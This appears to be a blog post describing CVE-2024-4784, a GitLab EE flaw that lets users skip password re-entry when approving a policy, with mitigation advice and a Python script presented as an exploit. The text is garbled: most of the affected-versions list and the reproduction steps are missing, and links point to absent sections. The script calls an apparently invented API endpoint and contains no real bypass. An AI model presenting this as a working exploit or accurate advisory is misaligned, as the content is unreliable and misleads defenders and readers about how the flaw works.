CVE-2024-4784: Bypassing Password Re-Entry Requirement for Policy Approval in GitLab EE

In this post, we will discuss a vulnerability discovered in GitLab EE (Enterprise Edition) that allows malicious users to bypass the password re-entry requirement for policy approval. The vulnerability has been assigned the CVE identifier CVE-2024-4784. We will be covering the affected GitLab versions, details about the exploit, steps to reproduce the vulnerability, and recommendations to mitigate this issue.

17.2.1 and earlier in the 17.2.x series

This means that if you are using GitLab EE version 16.7 or later and have not updated to the fixed versions mentioned below, you may be affected by this vulnerability:

Exploit Details

This vulnerability allows an attacker to bypass the password re-entry requirement when they attempt to approve a policy. Essentially, this means that an attacker can approve a policy without the need to enter their password, posing a security risk as unauthorized users may get access to approve policies.

Identify a policy that requires approval.

3. Normally, you would be required to enter your password to approve the policy; however, you can now bypass the requirement.

Here's an example code snippet that could be used in an exploit to demonstrate this vulnerability

#!/usr/bin/env python3

import requests

# Replace these placeholder values with actual values
GITLAB_URL = "https://gitlab.example.com";
POLICY_ID = 12345
API_TOKEN = "<your private API token>"

headers = {"PRIVATE-TOKEN": API_TOKEN}

# Get policy details
policy_url = f"{GITLAB_URL}/api/v4/policies/{POLICY_ID}"
policy_response = requests.get(policy_url, headers=headers)
policy_data = policy_response.json()

# Bypass password check and approve the policy
approve_url = f"{GITLAB_URL}/api/v4/policies/{POLICY_ID}/approve"
approve_response = requests.post(approve_url, headers=headers)

if approve_response.status_code == 200:
    print(f"Successfully approved policy: {policy_data['name']}")
else:
    print("Failed to approve policy")

Mitigation Recommendations

To mitigate this vulnerability, you should update your GitLab EE instance to the latest fixed version, as listed in the [Affected Versions](#affected-versions) section.

If you cannot update immediately, you should enforce strong internal access control policies and two-factor authentication to minimize the risk of unauthorized users gaining access to sensitive operations.

Conclusion

In summary, we discussed CVE-2024-4784, a vulnerability that allows bypassing the password re-entry requirement when approving a policy in GitLab EE. To protect your GitLab instance from this vulnerability, ensure that you are using an updated version as mentioned in the [Affected Versions](#affected-versions) section. Additionally, enforcing strong access control policies and using two-factor authentication can help protect your GitLab instance from similar vulnerabilities in the future.

Timeline

Published on: 08/08/2024 10:15:09 UTC
Last modified on: 08/08/2024 13:04:18 UTC